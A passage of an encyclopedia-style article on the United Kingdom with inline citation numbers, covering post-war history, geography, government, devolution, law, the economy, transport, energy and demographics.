Big Three powers (along with the US and the Soviet Union) who met to plan the post-war world; 117 it drafted the Declaration by United Nations with the United States and became one of the five permanent members of the United Nations Security Council. It worked closely with the United States to establish the IMF, World Bank and NATO. 118 The war left the UK severely weakened and financially dependent on the Marshall Plan, 119 but it was spared the total war that devastated eastern Europe. 120 In the immediate post-war years, the Labour government under Clement Attlee initiated a radical programme of reforms, which significantly impacted British society in the following decades. 121 Major industries and public utilities were nationalised, a welfare state was established, and a comprehensive, publicly funded healthcare system, the National Health Service, was created. 122 The rise of nationalism in the colonies coincided with Britain's much-diminished economic position, so that a policy of decolonisation was unavoidable. Independence was granted to India and Pakistan in 1947. 123 Over the next three decades, most colonies of the British Empire gained their independence, and many became members of the Commonwealth of Nations. 124 The UK was the third country to develop a nuclear weapons arsenal (with its first atomic bomb test, Operation Hurricane, in 1952), but the post-war limits of Britain's international role were illustrated by the Suez Crisis of 1956. The international spread of the English language ensured the continuing international influence of its literature and culture. 125 126 As a result of a shortage of workers in the 1950s, the government encouraged immigration from Commonwealth countries. In the following decades, the UK became a more multi-ethnic society. 127 Despite rising living standards in the late 1950s and 1960s, the UK's economic performance was less successful than many of its main competitors such as France, West Germany and Japan. The UK was the first democratic nation to lower its voting age to 18 in 1969. 128 In the decades-long process of European integration, the UK was a founding member of the Western European Union, established with the London and Paris Conferences in 1954. In 1960 the UK was one of the seven founding members of the European Free Trade Association (EFTA), but in 1973 it left to join the European Communities (EC). In a 1975 referendum 67% voted to stay in it. 129 When the EC became the European Union (EU) in 1992, the UK was one of the 12 founding member states. From the late 1960s, Northern Ireland suffered communal and paramilitary violence (sometimes affecting other parts of the UK) conventionally known as the Troubles. It is usually considered to have ended with the 1998 Belfast "Good Friday" Agreement. 130 Following a period of widespread economic slowdown and industrial strife in the 1970s, the Conservative government of the 1980s led by Margaret Thatcher initiated a radical policy of monetarism, deregulation, particularly of the financial sector (for example, the Big Bang in 1986) and labour markets, the sale of state-owned companies (privatisation), and the withdrawal of subsidies to others. 131 In 1982, Argentina invaded the British territories of South Georgia and the Falkland Islands, leading to the 10 week Falklands War in which Argentine forces were defeated. The inhabitants of the islands are predominantly descendants of British settlers, and strongly favour British sovereignty, expressed in a 2013 referendum. From 1984, the UK economy was helped by the inflow of substantial North Sea oil revenues. 132 Another British overseas territory, Gibraltar, ceded to Great Britain in the 1713 Treaty of Utrecht, 133 is a key military base for the UK. A referendum in 2002 on shared sovereignty with Spain was rejected by 98.97% of voters in the territory. Around the end of the 20th century, there were major changes to the governance of the UK with the establishment of devolved administrations for Scotland, Wales and Northern Ireland. 134 The statutory incorporation followed acceptance of the European Convention on Human Rights. The UK remained a great power with global diplomatic and military influence and a leading role in the United Nations and NATO. 135 The UK broadly supported the United States' approach to the "war on terror" in the early 21st century. 136 British troops fought in the War in Afghanistan, but controversy surrounded Britain's military deployment in Iraq, which saw the largest protest in British history demonstrating in opposition to the government led by Tony Blair. 137 The 2008 global financial crisis severely affected the UK economy. 138 The Cameron Clegg coalition government of 2010 introduced austerity measures intended to tackle the substantial public deficits. 139 Studies have suggested that policy led to significant social disruption and suffering. 140 141 A referendum on Scottish independence in 2014 resulted in the Scottish electorate voting by 55.3 to 44.7% to remain part of the United Kingdom. 142 In 2016, 51.9 per cent of voters in the United Kingdom voted to leave the European Union. 143 The UK left the EU in 2020. 144 On 1 May 2021 the EU UK Trade and Cooperation Agreement came into force. 145 The COVID 19 pandemic had a severe impact on the UK's economy, caused major disruptions to education and had far-reaching impacts on society and politics in 2020 and 2021. 146 147 148 The United Kingdom was the first country in the world to use an approved COVID 19 vaccine, developing its own vaccine through a collaboration between Oxford University and AstraZeneca, which allowed the UK's vaccine rollout to be among the fastest in the world. 149 150 On 8 September 2022, Elizabeth II, the longest-living and longest-reigning British monarch, died at the age of 96. 151 Upon the Queen's death, her eldest child Charles, Prince of Wales, acceded to the British throne as Charles III. 152 The total area of the United Kingdom is approximately 94,354 square miles (244,376 km2), e 12 with a land area of 93,723 square miles (242,741 km2). 12 The country occupies the major part of the British Isles 153 archipelago and includes the island of Great Britain, the north-eastern one-sixth of the island of Ireland and some smaller surrounding islands. It lies between the North Atlantic Ocean and the North Sea with the southeast coast coming within 22 miles (35 km) of the coast of northern France, from which it is separated by the English Channel. 154 The Royal Greenwich Observatory in London was chosen as the defining point of the Prime Meridian 155 at the International Meridian Conference in 1884. 156 The United Kingdom lies between latitudes 49 and 61 N, and longitudes 9 W and 2 E. Northern Ireland shares a 224 mile (360 km) land boundary with the Republic of Ireland. 154 The coastline of Great Britain is 11,073 miles (17,820 km) long, 157 though measurements can vary greatly due to the coastline paradox. 158 It is connected to continental Europe by the Channel Tunnel, which at 31 miles (50 km) (24 miles (38 km) underwater) is the longest underwater tunnel in the world. 159 The UK contains four terrestrial ecoregions: Celtic broadleaf forests, English Lowlands beech forests, North Atlantic moist mixed forests, and Caledonian conifer forests. 160 The area of woodland in the UK in 2023 is estimated to be 3.25 million hectares, which represents 13% of the total land area in the UK. 161 Most of the United Kingdom has a temperate climate, with generally cool temperatures and plentiful rainfall all year round. 154 The temperature varies with the seasons seldom dropping below 0 C (32 F) or rising above 30 C (86 F). 162 Some parts, away from the coast, of upland England, Wales, Northern Ireland and most of Scotland, experience a subpolar oceanic climate (Cfc). Higher elevations in Scotland experience a continental subarctic climate (Dfc) and the mountains experience a tundra climate (ET). 163 The prevailing wind is from the southwest and bears frequent spells of mild and wet weather from the Atlantic Ocean, 154 although the eastern parts are mostly sheltered from this wind. Since the majority of the rain falls over the western regions, the eastern parts are the driest. Atlantic currents, warmed by the Gulf Stream, bring mild winters, especially in the west where winters are wet and even more so over high ground. Summers are warmest in the southeast of England and coolest in the north. Heavy snowfall can occur in winter and early spring on high ground, and occasionally settles to great depth away from the hills. 164 The average total annual sunshine in the United Kingdom is 1339.7 hours, which is just under 30% of the maximum possible. 165 The hours of sunshine vary from 1200 to about 1580 hours per year, and since 1996 the UK has been and still is receiving above the 1981 to 2010 average hours of sunshine. 166 Climate change has a serious impact on the country. A third of food price rise in 2023 is attributed to climate change. 167 As of 2022, the United Kingdom is ranked 2nd out of 180 countries in the Environmental Performance Index. 168 A law has been passed that UK greenhouse gas emissions will be net zero by 2050. 169 England accounts for 53 per cent of the UK, covering 50,350 square miles (130,395 km2). 170 Most of the country consists of lowland terrain, 171 with upland and mountainous terrain northwest of the Tees Exe line which roughly divides the UK into lowland and upland areas. Lowland areas include Cornwall, the New Forest, the South Downs and the Norfolk Broads. Upland areas include the Lake District, the Pennines, the Yorkshire Dales, Exmoor, and Dartmoor. The main rivers and estuaries are the Thames, Severn, and the Humber. England's highest mountain is Scafell Pike, at 978 metres (3,209 ft) in the Lake District; its largest island is the Isle of Wight. Scotland accounts for 32 per cent of the UK, covering 30,410 square miles (78,772 km2). 172 This includes nearly 800 islands, 173 notably the Hebrides, Orkney Islands and Shetland Islands. Scotland is the most mountainous constituent country of the UK, the Highlands to the north and west are the more rugged region containing the majority of Scotland's mountainous land, including the Cairngorms, Loch Lomond and The Trossachs and Ben Nevis which at 1,345 metres (4,413 ft) 174 is the highest point in the British Isles. 175 Wales accounts for less than 9 per cent of the UK, covering 8,020 square miles (20,779 km2). 176 Wales is mostly mountainous, though South Wales is less mountainous than North and mid Wales. The highest mountains in Wales are in Snowdonia and include Snowdon (Welsh: Yr Wyddfa) which, at 1,085 metres (3,560 ft), is the highest peak in Wales. 171 Wales has over 1,680 miles (2,704 kilometres) of coastline including the Pembrokeshire Coast. 157 Several islands lie off the Welsh mainland, the largest of which is Anglesey (Ynys M n). Northern Ireland, separated from Great Britain by the Irish Sea and North Channel, has an area of 5,470 square miles (14,160 km2) and is mostly hilly. It includes Lough Neagh which, at 150 square miles (388 km2), is the largest lake in the British Isles by area, 177 Lough Erne which has over 150 islands and the Giant's Causeway which is a World Heritage Site. The highest peak in Northern Ireland is Slieve Donard in the Mourne Mountains at 852 metres (2,795 ft). 171 The UK is a constitutional monarchy and a parliamentary democracy operating under the Westminster system, otherwise known as a "democratic parliamentary monarchy". 178 It is a centralised, unitary state 179 180 wherein the Parliament of the United Kingdom is sovereign. 181 Parliament is made up of the elected House of Commons, the appointed House of Lords and the Crown (as personified by the monarch). r 184 The main business of parliament takes place in the two houses, 184 but royal assent is required for a bill to become an act of parliament (that is, statute law). 185 As a result of parliamentary sovereignty, the British constitution is uncodified, consisting mostly of disparate written sources, including parliamentary statutes, judge-made case law and international treaties, together with constitutional conventions. 186 Nevertheless, the Supreme Court recognises a number of principles underlying the British constitution, such as parliamentary sovereignty, the rule of law, democracy, and upholding international law. 187 King Charles III is the current monarch and head of state of the UK and of 14 other independent countries. These 15 countries are today referred to as "Commonwealth realms". The monarch is formally vested with all executive authority as the personal embodiment of the Crown and is ...fundamental to the law and working of government in the UK. 188 The disposition of such powers however, including those belonging to the royal prerogative, is generally exercised only on the advice of ministers of the Crown responsible to Parliament and thence to the electorate. Nevertheless, in the performance of official duties, the monarch has "the right to be consulted, the right to encourage, and the right to warn". 189 In addition, the monarch has a number of reserve powers at his disposal, albeit rarely used, to uphold responsible government and prevent constitutional crises. s For general elections (elections to the House of Commons), the UK is currently divided into 650 constituencies, each of which is represented by one member of Parliament (MP) elected by the first-past-the-post system. 191 MPs hold office for up to five years and must then stand for re-election if they wish to continue to be an MP. 191 The Conservative Party, colloquially known as the Tory Party or the Tories, and the Labour Party have been the dominant political parties in the UK since the 1920s, leading to the UK being described as a two-party system. However, since the 1920s other political parties have won seats in the House of Commons, although never more than the Conservatives or Labour. 192 The prime minister is the head of government in the UK. 193 Acting under the direction and supervision of a Cabinet of senior ministers selected and led by the prime minister, the Government serves as the principal instrument for public policymaking, administers public services and, through the Privy Council, promulgates statutory instruments and tenders advice to the monarch. 194 195 196 Nearly all prime ministers have served concurrently as First Lord of the Treasury 197 and all prime ministers have continuously served as First Lord of the Treasury since 1905, 198 Minister for the Civil Service since 1968, 199 and Minister for the Union since 2019. 200 While appointed by the monarch, in modern times the prime minister is, by convention, an MP, the leader of the political party with the most seats in the House of Commons, and holds office by virtue of their ability to command the confidence of the House of Commons. 201 202 203 The current Prime Minister, as of July 2024, is Sir Keir Starmer, leader of the Labour Party. Although not part of the United Kingdom, the three Crown Dependencies of Jersey, Guernsey and Isle of Man and 14 British Overseas Territories across the globe are subject to the sovereignty of the British Crown. The Crown exercises its responsibilities in relation to the Crown Dependencies mainly through the British government's Home Office and for the British Overseas Territories principally through the Foreign Office. 204 The geographical division of the United Kingdom into counties or shires began in England and Scotland in the early Middle Ages, and was completed throughout Great Britain and Ireland by the early Modern Period. 205 Modern local government by elected councils, partly based on the ancient counties, was established by separate Acts of Parliament: in England and Wales in 1888, Scotland in 1889 and Ireland in 1898, meaning there is no consistent system of administrative or geographic demarcation across the UK. 206 Until the 19th century there was little change to those arrangements, but there has since been a constant evolution of role and function. 207 Local government in England is complex, with the distribution of functions varying according to local arrangements. The upper-tier subdivisions of England are the nine regions, now used primarily for statistical purposes. 208 One of the regions, Greater London, has had a directly elected assembly and mayor since 2000 following popular support for the proposal in a 1998 referendum. 209 Local government in Scotland is divided into 32 council areas with a wide variation in size and population. The cities of Glasgow, Edinburgh, Aberdeen and Dundee are separate council areas, as is the Highland Council, which includes a third of Scotland's area but only just over 200,000 people. Local councils are made up of elected councillors, of whom there are 1,223. 210 Local government in Wales consists of 22 unitary authorities, each led by a leader and cabinet elected by the council itself. These include the cities of Cardiff, Swansea and Newport, which are unitary authorities in their own right. 211 Elections are held every four years under the first-past-the-post system. 211 Local government in Northern Ireland since 1973, has been organised into 26 district councils, each elected by single transferable vote. Their powers are limited to services such as waste collection, dog control, and maintaining parks and cemeteries. 212 In 2008 the executive agreed on proposals to create 11 new councils and replace the present system. 213 In the United Kingdom a process of devolution has transferred various powers from the UK Government to three of the four UK countries - Scotland, Northern Ireland and Wales, as well as to the regions of England. These powers vary and have been moved to the Scottish Government, the Welsh Government, the Northern Ireland Executive and in England, the Greater London Authority, Combined Authorities and Combined County Authorities. 214 The UK has an uncodified constitution and constitutional matters are not among the powers that have been devolved. Under the doctrine of parliamentary sovereignty, the UK Parliament could, in theory, therefore, abolish the Scottish Parliament, Senedd or Northern Ireland Assembly. 215 Though in the Scotland Act 2016 and the Wales Act 2017 it states that the Scottish Government and the Welsh Government "are a permanent part of the United Kingdom's constitutional arrangements". 216 217 In practice, it would be politically difficult for the UK Parliament to abolish devolution to the Scottish Parliament and the Senedd, because these institutions were created by referendum decisions. 218 The political constraints placed upon the UK Parliament's power to interfere with devolution in Northern Ireland are greater still, because devolution in Northern Ireland rests upon an international agreement with the Government of Ireland. 219 The UK Parliament restricts the three devolved parliaments' legislative powers in economic policy matters through an act passed in 2020. 220 The Greater London Authority (GLA) was set up following a referendum in 1998. Colloquially known as City Hall, it is the devolved regional government body of Greater London. It consists of two political branches: an Executive Mayor and the London Assembly, which serves as a checks and balance on the Mayor. A Combined Authority (CA) is a type of local government institution introduced in England outside Greater London by the Local Democracy, Economic Development and Construction Act 2009. CAs allow a group of local authorities to pool appropriate responsibility and receive certain devolved functions from central government in order to deliver transport and economic policy more effectively over a wider area. 221 A Combined County Authority (CCA) is a similar type of local government institution introduced in England outside Greater London by the Levelling-up and Regeneration Act 2023, but may only be formed by upper-tier authorities: county councils and unitary authorities. 222 Since 1999, Scotland has had a devolved national government and parliament with wide-ranging powers over any matter that has not been specifically reserved to the UK Parliament. 223 224 Their power over economic issues is significantly constrained by an act of the UK parliament passed in 2020. 220 The current Scottish Government is a Scottish National Party minority government, 232 led by First Minister John Swinney, leader of the Scottish National Party. In 2014, the Scottish independence referendum was held, with 55.3% voting against independence from the United Kingdom and 44.7% voting in favour, resulting in Scotland staying within the United Kingdom. Local government in Scotland is divided into 32 council areas with a wide variation in size and population. Local councils are made up of elected councillors, of whom there are 1,223. 210 The Scottish Parliament is separate from the Scottish Government. It is made up of 129 elected Members of the Scottish Parliament (MSPs). It is the law making body of Scotland, and thus it scrutinises the work of the incumbent Scottish Government and considers any piece of proposed legislation through parliamentary debates, committees and parliamentary questions. 233 Since 1999, Wales has a devolved national government and legislature, known as the Senedd. Elections to the Senedd use the additional member system. It has more limited powers than those devolved to Scotland. 234 The Senedd can legislate on any matter not specifically reserved to the UK Parliament by Acts of Senedd Cymru. The current Welsh Government is Labour, led by First Minister Vaughan Gething, who has been the First Minister since 2024. Local government in Wales consists of 22 unitary authorities, each led by a leader and cabinet elected by the council itself. The devolved form of government in Northern Ireland is based on the 1998 Good Friday Agreement, which brought to an end a 30 year period of unionist-nationalist communal conflict known as The Troubles. The Agreement was confirmed by referendum and implemented later that year. It established power sharing arrangements for a devolved government and legislature, referred to as the Executive and Assembly respectively. 235 Elections to the Assembly use the single transferable vote system. The Executive and Assembly have powers similar to those devolved to Scotland. 236 The Executive is led by a diarchy representing unionist and nationalist members of the Assembly. 237 The First Minister and deputy First Minister of Northern Ireland are the joint heads of government of Northern Ireland. 238 239 Local government in Northern Ireland since 2015 has been divided between 11 councils with limited responsibilities. 212 The UK is a permanent member of the United Nations Security Council, a member of NATO, AUKUS, the Commonwealth of Nations, the G7 finance ministers, the G7 forum, the G20, the OECD, the WTO, the Council of Europe and the OSCE. 240 The UK has the British Council which is a British organisation based in over 100 countries specialising in international cultural and educational opportunities. The UK is said to have a "Special Relationship" with the United States and a close partnership with France the "Entente cordiale" and shares nuclear weapons technology with both countries; 241 242 the Anglo-Portuguese Alliance is considered to be the oldest binding military alliance in the world. The UK is also closely linked with the Republic of Ireland; the two countries share a Common Travel Area and co-operate through the British-Irish Intergovernmental Conference and the British-Irish Council. Britain's global presence and influence is further amplified through its trading relations, foreign investments, official development assistance and military engagements. 243 Canada, Australia and New Zealand, all of which are former colonies of the British Empire which share King Charles as their head of state, are the most favourably viewed countries in the world by British people. 244 The United Kingdom does not have a single legal system as Article 19 of the 1706 Treaty of Union provided for the continuation of Scotland's separate legal system. 245 Today the UK has three distinct systems of law: English law, Northern Ireland law and Scots law. A new Supreme Court of the United Kingdom came into being in October 2009 to replace the Appellate Committee of the House of Lords. 246 The Judicial Committee of the Privy Council, including the same members as the Supreme Court, is the highest court of appeal for several independent Commonwealth countries, the British Overseas Territories and the Crown Dependencies. 247 Both English law, which applies in England and Wales, and Northern Ireland law are based on common law (or case law) principles. 248 It originated in England in the Middle Ages and is the basis for many legal systems around the world. 249 The courts of England and Wales are headed by the Senior Courts of England and Wales, consisting of the Court of Appeal, the High Court of Justice (for civil cases) and the Crown Court (for criminal cases). 250 Scots law is a hybrid system based on common-law and civil-law principles. The chief courts are the Court of Session, for civil cases, 251 and the High Court of Justiciary, for criminal cases. 252 The Supreme Court of the United Kingdom serves as the highest court of appeal for civil cases under Scots law. 253 Crime in England and Wales increased in the period between 1981 and 1995, though since that peak there has been an overall fall of 66 per cent in recorded crime from 1995 to 2015, 254 according to crime statistics. As of June 2023, the United Kingdom has the highest per-capita incarceration rate in Western Europe. 255 256 257 UK labour laws entitle staff to have a minimum set of employment rights including a minimum wage, a minimum of 28 days annual holiday, maternity leave and pay, parental leave, flexible working hours, statutory sick pay and a pension. Same-sex marriage has been legal in England, Scotland, and Wales since 2014, and in Northern Ireland since 2020. 258 LGBT equality in the United Kingdom is considered advanced by modern standards. 259 260 His Majesty's Armed Forces consist of three professional service branches: the Royal Navy and Royal Marines (forming the Naval Service), the British Army and the Royal Air Force. 261 The armed forces of the United Kingdom are managed by the Ministry of Defence and controlled by the Defence Council, chaired by the Secretary of State for Defence. The Commander-in-Chief is the British monarch, to whom members of the forces swear an oath of allegiance. 262 The Armed Forces are charged with protecting the UK and its overseas territories, promoting the UK's global security interests and supporting international peacekeeping efforts. They are active and regular participants in NATO, including the Allied Rapid Reaction Corps, the Five Power Defence Arrangements, RIMPAC and other worldwide coalition operations. Overseas garrisons and facilities are maintained in Ascension Island, Bahrain, Belize, Brunei, Canada, Cyprus, Diego Garcia, the Falkland Islands, Germany, Gibraltar, Kenya, Oman, Qatar and Singapore. 263 The UK is the 34th most peaceful country in the world, according to the 2024 Global Peace Index. 264 According to sources which include the Stockholm International Peace Research Institute and the International Institute for Strategic Studies, the UK has either the fourth- or the fifth-highest military expenditure. Total defence spending in 2024 is estimated at 2.3% of GDP. 265 Following the end of the Cold War, defence policy has a stated assumption that "the most demanding operations" will be undertaken as part of a coalition. 266 The UK has a regulated social market economy. 269 270 271 Based on market exchange rates, the UK is the sixth-largest economy in the world and the second-largest in Europe by nominal GDP. Its currency, the pound sterling, is the fourth most-traded currency in the foreign exchange market and the world's fourth-largest reserve currency (after the United States dollar, euro, and yen). 272 Sterling was the 2nd best-performing G10 currency against the dollar in 2023 with a gain of about 5%, with only the Swiss franc performing better. 273 274 London is the world capital for foreign exchange trading, with a global market share of 38.1% in 2022 275 of the daily $7.5 trillion global turnover. 276 HM Treasury, led by the Chancellor of the Exchequer, is responsible for developing and executing the government's public finance policy and economic policy. The Department for Business and Trade is responsible for business, international trade, and enterprise. The Bank of England is the UK's central bank and is responsible for issuing notes and coins in the pound sterling. Banks in Scotland and Northern Ireland retain the right to issue their own notes, subject to retaining enough Bank of England notes in reserve to cover their issue. In 2022, the UK became the world's fourth-largest exporter behind only China, the US, and Germany. 277 The estimated nominal GDP of the UK for 2024 is 2.765 trillion. 278 This value is 23% higher than the 2019 figure of 2.255 trillion 279 before leaving the EU (at similar US and EU exchange rates to 2019). 280 t Inflation in the UK rose by 2% in the year to May 2024 which was the governments target. 282 283 The service sector made up around 80% of the UK's GVA in 2021. 284 As of 2022, the UK is the world's second-largest exporter of services. 285 London is one of the world's largest financial centres, ranking second in the world in the Global Financial Centres Index in 2022. London also has the largest city GDP in Europe. 286 Edinburgh ranks 17th in the world, and sixth in Western Europe in the Global Financial Centres Index in 2020. 287 The British technology sector is valued at US$1 trillion, third behind the United States and China. 288 London has been named as the technology capital of Europe and the biggest technology hub in Europe. 289 Startups in the UK raised $6.7 billion in funding during the first half of 2024, overtaking China as the second place globally for funds raised. 290 The UK is home to 64 unicorns (companies worth more than $1 billion), about a quarter more than Germany and almost double the number in France. 291 The country's tourism sector is very important to the British economy; London was named as Europe's most popular destination for 2022. 292 293 The creative industries accounted for 5.9% of the UK's GVA in 2019, having grown by 43.6% in real terms from 2010. 294 Creative industries contributed more than 111bn to the UK economy in 2018, growth in the sector is more than five times larger than growth across the UK economy as a whole as reported in 2018. 295 Lloyd's of London is the world's largest insurance and reinsurance market and is located in London. 296 WPP plc, the world's biggest advertising company, is also based in the UK. The UK is one of the leading retail markets in Europe and is home to Europe's largest e-commerce market. 297 With consumption expenditures of over $2 trillion in 2023, the UK has the second-largest consumer market in Europe. 298 John Lewis is the UK's largest employee-owned business. 299 The British automotive industry employs around 800,000 people, with a turnover in 2022 of 67 billion, generating 27 billion of exports (10% of the UK's total export of goods). 300 In 2023, the UK produced around 905,100 passenger vehicles and 120,400 commercial vehicles, output was up 17.0% on the previous year. 301 Britain is known for iconic cars such as Mini and Jaguar, 302 also other luxury cars such as Rolls-Royce, Bentley and Range Rover. The UK is a major centre for engine manufacturing: in 2022 around 1.5 million engines were produced. 300 It is also the world's fourth-largest exporter of engines, as of 2021. 303 The UK motorsport industry employs more than 40,000 people, comprises around 4,300 companies and has an annual turnover of around 10 billion. 304 7 of the 10 Formula One teams are based in the UK, with their technology being used in supercars and hypercars from McLaren, Aston Martin and Lotus. u The aerospace industry of the UK is the second-largest national aerospace industry in the world depending upon the method of measurement clarification needed and has an annual turnover of around 30 billion. 305 The UK space industry was worth 17.5bn in 2020 21 and employed 48,800 people. Since 2012, the number of space organisations has grown on average nearly 21% per year, with 1,293 organisations reported in 2021. 306 307 The UK Space Agency has stated in 2023 that it is investing 1.6 billion in space-related projects. 308 Its agriculture industry is intensive, highly mechanised and efficient by European standards, producing approximately 60% of the country's overall food requirements and 73% of its indigenous food needs, utilising around 0.9 per cent of the labour force (292,000 workers). 309 Around two-thirds of production is devoted to livestock, one-third to arable crops. The UK retains a significant, though much reduced fishing industry. It is also rich in a variety of natural resources including coal, petroleum, natural gas, tin, limestone, iron ore, salt, clay, chalk, gypsum, lead, silica and an abundance of arable land. 310 The UK has among the highest levels of income inequality in the OECD, but has a very high HDI ranking. 311 312 The UK performs well in many dimensions of well-being in the OECD Better Life Index, outperforming the average in income, jobs, education, social connections, safety and life satisfaction. 313 England and Scotland were leading centres of the Scientific Revolution from the 17th century. 315 The United Kingdom led the Industrial Revolution from the 18th century, and has continued to produce scientists and engineers credited with important advances. 316 Major theorists from the 17th and 18th centuries include Isaac Newton, whose laws of motion and illumination of gravity have been seen as a keystone of modern science; 317 from the 19th century Charles Darwin, whose theory of evolution by natural selection was fundamental to the development of modern biology, and James Clerk Maxwell, who formulated classical electromagnetic theory; and more recently Stephen Hawking, who advanced major theories in the fields of cosmology, quantum gravity and the investigation of black holes. 318 The Department for Science, Innovation and Technology (DSIT) is responsible for helping to encourage, develop and manage the UK's scientific, research, and technological outputs. Scientific research and development remains important in British universities, with many establishing science parks to facilitate production and co-operation with industry. 319 In 2022 the UK retained its number one spot for technology in Europe reaching a combined market value of $1 trillion. Cambridge was named the number one university in the world for producing successful technology founders. 320 For four consecutive years, from 2020 to 2023, the UK maintained its fourth-place ranking in the Global Innovation Index, a position determined by approximately 80 indicators encompassing the political environment, education, infrastructure, and knowledge creation, among others. 321 314 During 2022, the UK produced 6.3 per cent of the world's scientific research papers and had a 10.5 per cent share of scientific citations, the third highest in the world for both. The UK ranked 1st in the world for Field-Weighted Citation Impact. 322 Scientific journals produced in the UK include publications by the Royal Society, Nature, the British Medical Journal and The Lancet. 323 A radial road network totals 29,145 miles (46,904 km) of main roads, 2,173 miles (3,497 km) of motorways and 213,750 miles (344,000 km) of paved roads. 154 The M25, encircling London, is the largest and busiest bypass in the world. 324 In 2022, there were a total of 40.8 million licensed vehicles in Great Britain. 325 The UK has an extensive railway network of 10,072 miles (16,209 km). In Great Britain, the British Rail network was privatised between 1994 and 1997, followed by a rapid rise in passenger numbers. Great British Railways is a planned state-owned public body that will oversee rail transport in Great Britain. The UK was ranked eighth among national European rail systems in the 2017 European Railway Performance Index assessing intensity of use, quality of service and safety. 326 The UK has a direct train between London and Paris which takes 2hrs 16mins 327 called the Eurostar, it travels through the Channel Tunnel under the English Channel, at 23.5 miles long it is the world's longest undersea tunnel. 328 There is also a car service through the tunnel to France called LeShuttle. The Elizabeth line, a rail link running between East and West London, was named in honour of Queen Elizabeth II in 2016 and opened in 2022. It was Europe's largest construction project at the time and is estimated to bring in 42 billion to the UK economy. 329 330 Another major infrastructure project is High Speed 2 (HS2), it is a new high speed railway currently under construction. It will link London with Birmingham, with the potential to extend further north and capable of speeds of up to 225 mph. 331 332 In 2014, there were 5.2 billion bus journeys in the UK, 2.4 billion of which were in London. 333 The red double-decker bus has entered popular culture as an internationally recognised icon of England. 334 The London bus network is extensive, with over 6,800 scheduled services every weekday carrying about six million passengers on over 700 different routes making it one of the most extensive bus systems in the world and the largest in Europe. 335 During 2023, UK airports handled a total of 272.8 million passengers. 336 In that period the three largest airports were London Heathrow Airport (79.1 million passengers), Gatwick Airport (40.9 million passengers) and Manchester Airport (28.1 million passengers). 336 London Heathrow Airport, located 15 miles (24 km) west of the capital, is the world's second busiest airport by international passenger traffic and has the most international passenger traffic of any airport in the world; 337 it is the hub for the UK flag carrier British Airways, as well as Virgin Atlantic. 338 In 2021, the UK was the world's 14th-largest consumer of energy and the 22nd-largest producer. 339 The UK is home to many large energy companies, including two of the six major oil and gas companies BP and Shell. 340 The UK is considered a world leader in combatting climate change, being home to the world's first climate change act and reducing its emissions faster than any major economy since 1990. 341 The total of all renewable electricity sources provided 43% of the electricity generated in the UK in 2020. 342 A world leader in green energy and technology, the UK is the best site in Europe for wind energy and one of the best in the world. 343 Wind power production is the country's fastest-growing supply; in 2022, 26.8% of the UK's total electricity was generated by wind power. 344 The UK has the largest offshore wind farm in the world, which is located off the coast of Yorkshire. 345 The UK is home to seven of the ten biggest wind farms in Europe. 346 In 2023, the UK had 9 nuclear reactors normally generating about 15 per cent of the UK's electricity. 347 Unlike Germany and Japan, there are two reactors under construction and more planned. 348 349 In the late 1990s, nuclear power plants contributed around 25 per cent of the total annual electricity generation in the UK, but this has gradually declined as old plants have been shut down. The UK Government is investing in Small Modular Reactors, Advanced Modular Reactors and Nuclear Fusion Reators 350 research and development. In 2021, the UK produced 935 thousand barrels per day (bbl d) of oil (and other liquids) and consumed 1,258 thousand bbl d. 339 Production is now when? in decline and the UK has been a net importer of oil since 2005. 351 In 2020 update , the UK had around 2 billion barrels of proven crude oil reserves. 351 In 2021, the UK was the 21st-largest producer of natural gas in the world. 352 Production is now when? in decline and the UK has been a net importer of natural gas since 2004. 352 In 2020, the UK produced 1.8 million tonnes of coal falling 91% in 10 years. 347 In 2020 it had proven recoverable coal reserves of 26 million tonnes. 347 The UK Coal Authority has stated that there is a potential to produce between 7 billion tonnes and 16 billion tonnes of coal through underground coal gasification (UCG) or 'fracking', 353 and based on current UK coal consumption, such reserves could last between 200 and 400 years. 354 Access to improved water supply and sanitation in the UK is universal. It is estimated that 96 per cent of households are connected to the sewer network. 355 According to the Environment Agency, total water abstraction for public water supply in the UK was 16,406 megalitres per day in 2007. 356 In England and Wales water and sewerage services are provided by 10 private regional water and sewerage companies and 13 mostly smaller private "water only" companies. In Scotland, water and sewerage services are provided by a single public company, Scottish Water. In Northern Ireland water and sewerage services are also provided by a single public entity, Northern Ireland Water. 357 In the 2011 census the total population of the United Kingdom was 63,181,775. 358 It is the fourth-largest in Europe (after Russia, Germany and France), the fifth-largest in the Commonwealth and the 22nd-largest in the world. In mid 2014 and mid 2015 net long-term international migration contributed more to population growth. In mid 2012 and mid 2013 natural change contributed the most to population growth. 359 Between 2001 and 2011 the population increased by an average annual rate of approximately 0.7 per cent. 358 The 2011 census also showed that, over the previous 100 years, the proportion of the population aged 0 14 fell from 31 per cent to 18 per cent, and the proportion of people aged 65 and over rose from 5 to 16 per cent. 358 In 2018 the median age of the UK population was 41.7 years. 360 England's population in 2011 was 53 million, representing some 84 per cent of the UK total. 362 It is one of the most densely populated countries in the world, with 420 people per square kilometre in mid 2015, 359 with a particular concentration in London and the south-east. 363 The 2011 census put Scotland's population at 5.3 million, 364 Wales at 3.06 million and Northern Ireland at 1.81 million. 362 In 2017 the total fertility rate (TFR) across the UK was 1.74 children born per woman. 365 While a rising birth rate is contributing to population growth, it remains considerably below the baby boom peak of 2.95 children per woman in 1964, 366 or the high of 6.02 children born per woman in 1815, 367 below the replacement rate of 2.1, but higher than the 2001 record low of 1.63. 368 In 2011, 47.3 per cent of births in the UK were to unmarried women. 369 The Office for National Statistics reported in 2015 that out of the UK population aged 16 and over, 1.7 per cent identify as gay, lesbian, or bisexual (2.0 per cent of males and 1.5 per cent of females); 4.5 per cent of respondents responded with "other", "I don't know", or did not respond. 370 The number of transgender people in the UK was estimated to be between 65,000 and 300,000 by research between 2001 and 2008. 371 Historically, indigenous British people were thought to be descended from the various ethnic groups that settled there before the 12th century: the Celts, Romans, Anglo-Saxons, Norse and the Normans. Welsh people could be the oldest ethnic group in the UK. 375 The UK has a history of non-white immigration with Liverpool having the oldest Black population in the country dating back to at least the 1730s during the period of the African slave trade. During this period it is estimated the Afro-Caribbean population of Great Britain was 10,000 to 15,000 376 which later declined due to the abolition of slavery. 377 The UK also has the oldest Chinese community in Europe, dating to the arrival of Chinese seamen in the 19th century. 378 In 2011 update , 87.2 per cent of the UK population identified themselves as white, meaning 12.8 per cent of the UK population identify themselves as of one of an ethnic minority group. 379 Ethnic diversity varies significantly across the UK. 30.4 per cent of London's population and 37.4 per cent of Leicester's was estimated to be non-white in 2005 update , 383 whereas less than 5 per cent of the populations of North East England, Wales and the South West were from ethnic minorities, according to the 2001 census. 384 In 2016 